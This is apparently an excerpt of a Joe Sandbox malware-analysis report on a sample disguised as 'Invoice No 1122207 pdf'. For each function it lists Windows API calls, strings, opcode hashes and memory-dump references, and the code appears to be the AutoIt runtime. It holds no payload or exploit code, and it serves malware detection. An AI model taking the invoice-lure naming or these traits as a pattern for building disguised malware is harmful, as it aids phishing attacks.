TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0047EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0047EB75

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 9833bf06cacfe7257034509a113eb5214938d23b96800fcfedc48189a40a840d
Instruction ID: 9e055b19992bea128c1e96962202570f0e47ffc8bf24a53ce0b8b7c318cd5711
Opcode Fuzzy Hash: 9833bf06cacfe7257034509a113eb5214938d23b96800fcfedc48189a40a840d
Instruction Fuzzy Hash: 3FF05472240158BBE7619B529C4DEEF3E7CEFCBB11F004169F601D1191DBA05A01CAB9

Function 00467439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00467452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00467469
GetWindowDC.USER32(?), ref: 00467475
GetPixel.GDI32(00000000,?,?), ref: 00467484
ReleaseDC.USER32(?,00000000), ref: 00467496
GetSysColor.USER32(00000005), ref: 004674B0

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 93c9250fc3b27b4d275d6063ab14f121d8382c43f99ff1df49e7e13a0a3fb3de
Instruction ID: 37d12297833d4d9562e8c5ae27ae2f72ad7d91c848f1b1e770cf022df2df1e3b
Opcode Fuzzy Hash: 93c9250fc3b27b4d275d6063ab14f121d8382c43f99ff1df49e7e13a0a3fb3de
Instruction Fuzzy Hash: 6A018B31500215FFEB909F64DD48BAA7FB5FB05311F500071F915A21A1CF311E42AB59

Function 00471874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0047187F
UnloadUserProfile.USERENV(?,?), ref: 0047188B
CloseHandle.KERNEL32(?), ref: 00471894
CloseHandle.KERNEL32(?), ref: 0047189C
GetProcessHeap.KERNEL32(00000000,?), ref: 004718A5
HeapFree.KERNEL32(00000000), ref: 004718AC

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 9bf72216978b42fe2df08dc3f184cd041d70c36a5b0b1ebf7cab93073d43d17f
Instruction ID: a6468c14aaad85d95ab4b43a71100f0c1fd1e9a74cc05d3d72b1e6cbacef8e77
Opcode Fuzzy Hash: 9bf72216978b42fe2df08dc3f184cd041d70c36a5b0b1ebf7cab93073d43d17f
Instruction Fuzzy Hash: 04E0E576204101BBDB416FA1ED4C90ABF79FF4AB22B108230F22581070CB329421DF58

Function 00497B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00430242: EnterCriticalSection.KERNEL32(004E070C,004E1884,?,?,0042198B,004E2518,?,?,?,004112F9,00000000), ref: 0043024D
Part of subcall function 00430242: LeaveCriticalSection.KERNEL32(004E070C,?,0042198B,004E2518,?,?,?,004112F9,00000000), ref: 0043028A

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

Part of subcall function 004300A3: __onexit.LIBCMT ref: 004300A9

__Init_thread_footer.LIBCMT ref: 00497BFB

Part of subcall function 004301F8: EnterCriticalSection.KERNEL32(004E070C,?,?,00428747,004E2514), ref: 00430202
Part of subcall function 004301F8: LeaveCriticalSection.KERNEL32(004E070C,?,00428747,004E2514), ref: 00430235

Strings

Variable must be of type 'Object'., xrefs: 00497C3A
+TF, xrefs: 00497E2E
5, xrefs: 00497C78
G, xrefs: 00497C7F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: +TF$5$G$Variable must be of type 'Object'.
API String ID: 535116098-4280218163
Opcode ID: 34f4335ae87398ea6554ab1466d241b5cfc3f6fd898b03129617a562190698b1
Instruction ID: dc8afd1bf4116c1208d511a716ebc4e0fe3f2365de9aa8903e19c7bac440db70
Opcode Fuzzy Hash: 34f4335ae87398ea6554ab1466d241b5cfc3f6fd898b03129617a562190698b1
Instruction Fuzzy Hash: 6C91AD70A14208EFCF04EF55D8919AEBBB1BF49304F14816EF8065B392DB79AE41CB59

Function 0047C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00417620: _wcslen.LIBCMT ref: 00417625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0047C6EE
_wcslen.LIBCMT ref: 0047C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0047C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0047C7CA

Strings

0, xrefs: 0047C6AF

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 287234ef767988575cf0a1f4b5457f6a126c28b916017bfe49ae8d637a88eeeb
Instruction ID: 036c8139172a9f7fd1662064223204c19d98b54ff38c2ffca6a104d234804fbf
Opcode Fuzzy Hash: 287234ef767988575cf0a1f4b5457f6a126c28b916017bfe49ae8d637a88eeeb
Instruction Fuzzy Hash: 4251E3716043019BD7189F29C8C5BEB77E4AF49314F04892FF999D32A1DB78D904CB5A

Function 0049AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0049AEA3

Part of subcall function 00417620: _wcslen.LIBCMT ref: 00417625

GetProcessId.KERNEL32(00000000), ref: 0049AF38
CloseHandle.KERNEL32(00000000), ref: 0049AF67

Strings

@, xrefs: 0049AE72
<, xrefs: 0049AE6B

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 13501553869bfd137d5e5206a675f546fd8a5e882492ef3f64474006c16322e8
Instruction ID: 768865b3bdf31409f9d64233fa41ed74dc96dff1021e3930170bc98b8bc759db
Opcode Fuzzy Hash: 13501553869bfd137d5e5206a675f546fd8a5e882492ef3f64474006c16322e8
Instruction Fuzzy Hash: 4D714970A00615DFCF14DF55C484A9EBBF1BF08318F0484AAE81AAB751CB78ED95CB99

Function 0047719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00477206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0047723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0047724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004772CF

Strings

DllGetClassObject, xrefs: 00477242

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 84df3b845cbf5adf0a617163e0c43572df966713748ba81f1eda258850e5e808
Instruction ID: 78e40fe605dddce31242282e7b0a38f9ab9f1a9eb59d5bfeefa87fa2826868c2
Opcode Fuzzy Hash: 84df3b845cbf5adf0a617163e0c43572df966713748ba81f1eda258850e5e808
Instruction Fuzzy Hash: 1A419D71A04204AFDB15CF54C884ADA7BA9EF44314F60C0AEFD099F20AD7B8D944CBA4

Function 004A3D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004A3E35
IsMenu.USER32(?), ref: 004A3E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004A3E92
DrawMenuBar.USER32 ref: 004A3EA5

Strings

0, xrefs: 004A3D89

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: be11eda8e55823a4c5dd314aef5c7d7854119da3bd2d32cddc10917f40bcded8
Instruction ID: 358611fc54028fd19411c81743056fbcd683b987c2e189c7972843d632d761f0
Opcode Fuzzy Hash: be11eda8e55823a4c5dd314aef5c7d7854119da3bd2d32cddc10917f40bcded8
Instruction Fuzzy Hash: 81415975A01209EFDB10DF50D884AABBBB5FF5A356F04412AF9059B350E734AE41CF54

Function 00471DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

Part of subcall function 00473CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00473CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00471E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00471E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 00471EA9

Part of subcall function 00416B57: _wcslen.LIBCMT ref: 00416B6A

Strings

ComboBox, xrefs: 00471DF0
ListBox, xrefs: 00471E25

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: fcd7cf904d7308153dce43978353767f0b215e2d063cb88332d8ccdeaf136e86
Instruction ID: 76072e64cfff2d64756e7fc843cbb86739bdd03fa2d33123d0401edc891935ab
Opcode Fuzzy Hash: fcd7cf904d7308153dce43978353767f0b215e2d063cb88332d8ccdeaf136e86
Instruction Fuzzy Hash: 6B213771A00104BEDB14AB69DC56DFFB7B8DF42354B10812FF859A32E0DB3C4D4A8628

Function 004A2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 004A2F8D
LoadLibraryW.KERNEL32(?), ref: 004A2F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 004A2FA9
DestroyWindow.USER32(?), ref: 004A2FB1

Strings

SysAnimate32, xrefs: 004A2F68

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 5a059ece18695e012411c228c778116c19e0e175ffa8178757ede497c9db3c28
Instruction ID: 1b84eb1fdade81f0549b63b0f3455e8ea16a86318cb4c701d95909bb8856eeed
Opcode Fuzzy Hash: 5a059ece18695e012411c228c778116c19e0e175ffa8178757ede497c9db3c28
Instruction Fuzzy Hash: 5521C371200205AFEB108F68DD80FBB37BDEB6A368F10422AF950D6290D7B5DC51B768

Function 00434D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00434D1E,004428E9,?,00434CBE,004428E9,004D88B8,0000000C,00434E15,004428E9,00000002), ref: 00434D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00434DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00434D1E,004428E9,?,00434CBE,004428E9,004D88B8,0000000C,00434E15,004428E9,00000002,00000000), ref: 00434DC3

Strings

CorExitProcess, xrefs: 00434D98
mscoree.dll, xrefs: 00434D86

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 17d6c6ef9b1753d6ba9eb775796148d862211fa9ea9ac1400f165082f0fac582
Instruction ID: 4a44dd46e48559abad93e14b117633f573e7f023cd2bac84df3a9d42d1da2fbb
Opcode Fuzzy Hash: 17d6c6ef9b1753d6ba9eb775796148d862211fa9ea9ac1400f165082f0fac582
Instruction Fuzzy Hash: E8F03134640208ABDB515F94DC49BDEBFE5EB48752F0001AAE805A2250CB745940DE98

Function 00414E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00414EDD,?,x,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00414E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00414EAE
FreeLibrary.KERNEL32(00000000,?,?,00414EDD,?,x,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00414EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 00414EA8
kernel32.dll, xrefs: 00414E94

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 2fcb139f9e97e8b65accf9693ffe75c06bc64cadc27bfd00ff72ecb099ccb975
Instruction ID: 9388f1a29be9f88115b5940574dbe45d4e4491b1a4eb700cbc59b58498d1ec89
Opcode Fuzzy Hash: 2fcb139f9e97e8b65accf9693ffe75c06bc64cadc27bfd00ff72ecb099ccb975
Instruction Fuzzy Hash: E8E0CD35B017229BD2711B257C58B9F6954AFC3F637050127FC04D2304DB68DD4148BD

Function 00414E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00453CDE,?,x,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00414E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00414E74
FreeLibrary.KERNEL32(00000000,?,?,00453CDE,?,x,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00414E87

Strings

kernel32.dll, xrefs: 00414E5B
Wow64RevertWow64FsRedirection, xrefs: 00414E6E

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: dc3b485f2ac8406f4e6247426b62578b71c011e96e7fac995004df403e123362
Instruction ID: 989c52f1e93b047bff59084ed21e506efb34e8f80c4f378a66b6b0d8b510ba05
Opcode Fuzzy Hash: dc3b485f2ac8406f4e6247426b62578b71c011e96e7fac995004df403e123362
Instruction Fuzzy Hash: ADD0C2356427226746621B247C18ECB2E18AFC3B213050223F800A2214CF29CD42C9EC

Function 00482947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00482C05
DeleteFileW.KERNEL32(?), ref: 00482C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00482C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00482CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00482CC0

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 2475dc92e939c9ddb85faee6a47c549d36e960f863492adec3b7576a9b974c9d
Instruction ID: 5cf82a61d61d2dfd5d181f94456cb88ce852856a03885391282a198eab559881
Opcode Fuzzy Hash: 2475dc92e939c9ddb85faee6a47c549d36e960f863492adec3b7576a9b974c9d
Instruction Fuzzy Hash: 4DB17E72D01119ABDF11EFA5CD85EEEBB7CEF48304F0044ABF509A6141EB789A448F69

Function 0049A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0049A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0049A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0049A468
CloseHandle.KERNEL32(?), ref: 0049A63D

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 71c1b86212517bf088a48dc3e24476c5c81eed2aa183d8d75e9ac8d426c70b42
Instruction ID: 9082ec479254e114fbc28b0797779e1aeb1a99a403012a6b58db033f1b30d769
Opcode Fuzzy Hash: 71c1b86212517bf088a48dc3e24476c5c81eed2aa183d8d75e9ac8d426c70b42
Instruction Fuzzy Hash: 50A19371604300AFDB20DF15D885F2ABBE5AF44718F14882EF9999B3D2D7B4EC418B96

Function 0044BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004B3700), ref: 0044BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,004E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0044BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,004E1270,000000FF,?,0000003F,00000000,?), ref: 0044BC36
_free.LIBCMT ref: 0044BB7F

Part of subcall function 004429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0044D7D1,00000000,00000000,00000000,00000000,?,0044D7F8,00000000,00000007,00000000,?,0044DBF5,00000000), ref: 004429DE
Part of subcall function 004429C8: GetLastError.KERNEL32(00000000,?,0044D7D1,00000000,00000000,00000000,00000000,?,0044D7F8,00000000,00000007,00000000,?,0044DBF5,00000000,00000000), ref: 004429F0

_free.LIBCMT ref: 0044BD4B

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 89655aef374f3786b320aa648b706b31e08314b5e144f8f6834667acac800707
Instruction ID: 0a4b96cad64463c0c510b95a757c983b12f7399a9e43482ed5795104e8fce694
Opcode Fuzzy Hash: 89655aef374f3786b320aa648b706b31e08314b5e144f8f6834667acac800707
